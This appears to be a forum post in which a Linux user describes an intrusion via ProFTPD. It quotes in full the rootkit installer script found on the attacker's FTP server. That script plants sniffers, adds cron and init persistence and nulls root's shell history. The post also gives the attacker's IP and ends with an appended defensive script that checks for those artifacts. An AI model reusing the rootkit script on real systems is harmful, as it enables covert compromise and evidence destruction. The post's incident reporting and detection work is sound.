I was examining my own Mandrake 9.2 system this evening, watching the incoming and outgoing logs on my Linksys router. I've been suspicious for a few weeks now that perhaps there are some illicit outgoing connections from this box. Snort is installed along with ACID, and I've been trying to set up Tripwire... Suddenly, the router picks up an OUTBOUND ftp connection from my box. Very damn odd. I yanked the ethernet plug from the box and wrote down the IP address of the outbound connection. I jumped over to another computer and ftp'd to that server, logging in anonymously.
There was a rootkit script sitting there. I downloaded it and opened it with a text editor. Here are the contents:
Code:
clear
echo
echo "--------------profesional rootkit for redhat linux-------------"
echo -n " -o-o-o-o-o-o-o-o-o-o-o-"
if [ -x /dev/ida ]
then echo "/dev/ida/ exists...no need to create it"
else mkdir /dev/ida/
fi
if [ -x /dev/ida/inet/ ]
then echo "/dev/ida/inet/ exists...no need to create it"
else mkdir /dev/ida/inet/
fi
mv pizda.tar.gz /dev/ida/inet/
cd /dev/ida/inet/
tar -xzvf pizda.tar.gz -C /dev/ida/inet/
rm -rf /etc/rc.d/init.d/linuxconf
if [ -f /usr/lib/httpd ]
then echo "/usr/lib/httpd exists...in pizda masii de treaba !!!"
else mv /dev/ida/inet/pizda/sniff/httpd /usr/lib/httpd
fi
if [ -f /usr/lib/sense ]
then echo "/usr/lib/sense exists... deci prin urmare il las acolo ca nu strica !!!"
else mv /dev/ida/inet/pizda/sniff/sense /usr/lib/sense
fi
rm -rf /etc/cron.daily/dnsquery
rm -rf /etc/rc.d/init.d/linuxconf
mv /dev/ida/inet/pizda/sniff/dnsquery /etc/cron.daily/dnsquery
mv /dev/ida/inet/pizda/redhat/linuxconf /etc/rc.d/init.d/linuxconf
rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history
echo "+++ [ OK ] with the /root/.bash_history file..."
There were also some files in a directory called 'lib' that had names like libc-2.2.2.so and ld-linux.so.2. I downloaded those as well.
So I go back to check my router's incoming log, and the attacker is repeatedly hitting ports 21 and 113. If the Linksys is doing its job right, 113 (identd) isn't forwarded to my Mandrake box (still unplugged from the network anyway), but 21 is the ftp port and was being forwarded to the Mandrake box. I checked the Mandrake security bulletins and, sure enough, there is a remote root shell exploit out on ProFTP. Here is the advisory.
http://www.mandrakesecure.net/en/adv...KSA-2003:095-1
Looks like another re-install for me in under a month.
di11rod
Oh yeah, here's the attacker's IP address:
211.21.91.18
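The installer script quoted in the post leaves a fixed set of artifacts on disk: the /dev/ida staging directory, two sniffer components dropped as regular files into /usr/lib, a cron.daily/dnsquery job, a replaced linuxconf init script, and /root/.bash_history symlinked to /dev/null. The following is an added example of an offline indicator check for exactly those artifacts; it is not part of the original post. The function name check_ida_rootkit, the ROOT-prefix argument (so a mounted image of the suspect disk can be scanned from a clean machine), the HIT/REVIEW output format and the script filename in the execution guard are all my own assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: indicator check for the
# /dev/ida rootkit installer quoted above. Function name, ROOT argument and
# output format are assumptions of this example.
#
# Usage:  check_ida_rootkit /mnt/suspect     (mounted image of the suspect disk)
#         check_ida_rootkit                  (live root filesystem of a box you distrust)

check_ida_rootkit() {
    root="${1:-}"          # path prefix; empty means the live root filesystem
    hits=0

    # Staging directory the installer creates: a hidden tree under /dev,
    # where nobody expects regular files or tarballs.
    if [ -d "$root/dev/ida" ]; then
        echo "HIT: $root/dev/ida exists (rootkit staging directory)"
        hits=$((hits + 1))
    fi

    # Sniffer components dropped as *regular files* into /usr/lib. A stock
    # httpd binary lives in /usr/sbin, and there is no legitimate /usr/lib/sense.
    for f in /usr/lib/httpd /usr/lib/sense; do
        if [ -f "$root$f" ]; then
            echo "HIT: $root$f is a regular file dropped by the installer"
            hits=$((hits + 1))
        fi
    done

    # Persistence: a daily cron job named dnsquery (no distribution ships one)
    # and a replaced linuxconf init script. linuxconf may legitimately exist,
    # so it is flagged for review rather than counted as a hit.
    if [ -e "$root/etc/cron.daily/dnsquery" ]; then
        echo "HIT: $root/etc/cron.daily/dnsquery present (cron persistence)"
        hits=$((hits + 1))
    fi
    if [ -e "$root/etc/rc.d/init.d/linuxconf" ]; then
        echo "REVIEW: $root/etc/rc.d/init.d/linuxconf present; compare with rpm -Vf"
    fi

    # Anti-forensics: root's shell history redirected to /dev/null.
    if [ -L "$root/root/.bash_history" ] &&
       [ "$(readlink "$root/root/.bash_history")" = /dev/null ]; then
        echo "HIT: $root/root/.bash_history is a symlink to /dev/null"
        hits=$((hits + 1))
    fi

    echo "TOTAL: $hits indicator(s)"
    [ "$hits" -eq 0 ]      # exit status 0 = clean, 1 = indicators found
}

# Assumed filename for direct execution; when sourced, nothing runs automatically.
if [ "${0##*/}" = "check_ida_rootkit.sh" ]; then
    check_ida_rootkit "$1"
fi
```

Run it from a known-good system against the suspect disk mounted read-only rather than on the compromised box itself: the post notes that libc-2.2.2.so and ld-linux.so.2 came with the kit, so any binary on the infected host, including ls, readlink and this shell, may be lying. A clean scan proves only that these particular artifacts are absent; the user's conclusion to reinstall is the right call regardless.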